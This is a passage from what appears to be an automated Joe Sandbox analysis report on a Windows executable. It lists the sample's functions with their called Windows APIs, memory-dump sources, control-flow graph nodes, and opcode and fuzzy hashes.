                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FilePointermemmove
                                                              • String ID:
                                                              • API String ID: 2366752189-0
                                                              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50
                                                              Function 0000000140001000 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                              • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                              • ExitProcess.KERNEL32 ref: 0000000140001258
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                              • String ID: 0w
                                                              • API String ID: 1207063833-4020514967
                                                              • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                              • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22
                                                              Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67filememoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 581 14000e3f0-14000e404 582 14000e4f3-14000e4fd 581->582 583 14000e40a-14000e40e 581->583 583->582 584 14000e414-14000e418 583->584 585 14000e483-14000e4a6 call 14000e770 584->585 586 14000e41a-14000e423 584->586 593 14000e4a8-14000e4b5 585->593 594 14000e4ee 585->594 588 14000e451-14000e45b 586->588 589 14000e425 586->589 588->588 590 14000e45d-14000e482 WriteFile 588->590 592 14000e430-14000e43a 589->592 592->592 595 14000e43c-14000e450 call 14000e620 592->595 596 14000e4c5-14000e4d6 WriteFile 593->596 597 14000e4b7-14000e4ba call 14000e620 593->597 594->582 600 14000e4dc-14000e4e8 HeapFree 596->600 602 14000e4bf-14000e4c3 597->602 600->594 602->600
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$FreeHeap
                                                              • String ID:
                                                              • API String ID: 74418370-0
                                                              • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                              • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00
                                                              Function 000000014000E770 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 603 14000e770-14000e7b7 WideCharToMultiByte 604 14000e7b9-14000e7d6 HeapAlloc 603->604 605 14000e81f-14000e822 603->605 606 14000e804 604->606 607 14000e7d8-14000e801 WideCharToMultiByte 604->607 608 14000e809-14000e81e 605->608 606->608 607->606
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocHeap
                                                              • String ID:
                                                              • API String ID: 3475569825-0
                                                              • Opcode ID: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction ID: ae5164d7e213c5423ce426761272d4060c1fe25f0e8d52ef4d31f29a04fa76ea
                                                              • Opcode Fuzzy Hash: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction Fuzzy Hash: D9112B72615B8082E754DF26B84435AB7A5FBC8BD0F148228EF9D63BA4DF38C5229704
                                                              Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 609 14000d914-14000d922 610 14000d924-14000d95a wcsncpy wcslen 609->610 611 14000d99e 609->611 612 14000d98a-14000d99c CreateDirectoryW 610->612 613 14000d95c-14000d96b 610->613 614 14000d9a0-14000d9a8 611->614 612->614 613->612 615 14000d96d-14000d97b 613->615 615->612 616 14000d97d-14000d988 615->616 616->612 616->613
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 961886536-0
                                                              • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                              • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14
                                                              Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 617 14000b538-14000b573 memset InitCommonControlsEx CoInitialize
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CommonControlsInitInitializememset
                                                              • String ID:
                                                              • API String ID: 2179856907-0
                                                              • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                              • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00
                                                              Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$Value
                                                              • String ID:
                                                              • API String ID: 3898337583-0
                                                              • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                              • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00
                                                              Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CodeExitProcess
                                                              • String ID: open
                                                              • API String ID: 3861947596-2758837156
                                                              • Opcode ID: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                              • Opcode Fuzzy Hash: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40
                                                              Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                              • String ID:
                                                              • API String ID: 547990026-0
                                                              • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                              • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
                                                              Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerVectored$Remove
                                                              • String ID:
                                                              • API String ID: 3670940754-0
                                                              • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                              • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348
                                                              Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 674 14000da6c-14000da80 676 14000da82-14000da85 674->676 677 14000da9f 674->677 679 14000da92-14000da9d DeleteFileW 676->679 680 14000da87-14000da8c SetFileAttributesW 676->680 678 14000daa1-14000daa6 677->678 679->678 680->679
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDelete
                                                              • String ID:
                                                              • API String ID: 2910425767-0
                                                              • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                              • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                              Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$CreateValue
                                                              • String ID:
                                                              • API String ID: 493873155-0
                                                              • Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
                                                              • Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
                                                              Function 00000001400120A0 Relevance: 3.0, APIs: 2, Instructions: 7memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DestroyFreeHeap
                                                              • String ID:
                                                              • API String ID: 3293292866-0
                                                              • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
                                                              • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
                                                              Function 0000000140011D30 Relevance: 2.6, APIs: 2, Instructions: 67memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocFreememset
                                                              • String ID:
                                                              • API String ID: 3063399779-0
                                                              • Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
                                                              • Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340
                                                              Function 00000001400126D0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapValue
                                                              • String ID:
                                                              • API String ID: 2362848668-0
                                                              • Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
                                                              • Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40
                                                              Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CloseFreeHandleHeap
                                                              • String ID:
                                                              • API String ID: 1642312469-0
                                                              • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                                              • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                                              Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                                              • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                                              Function 000000014000C45C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
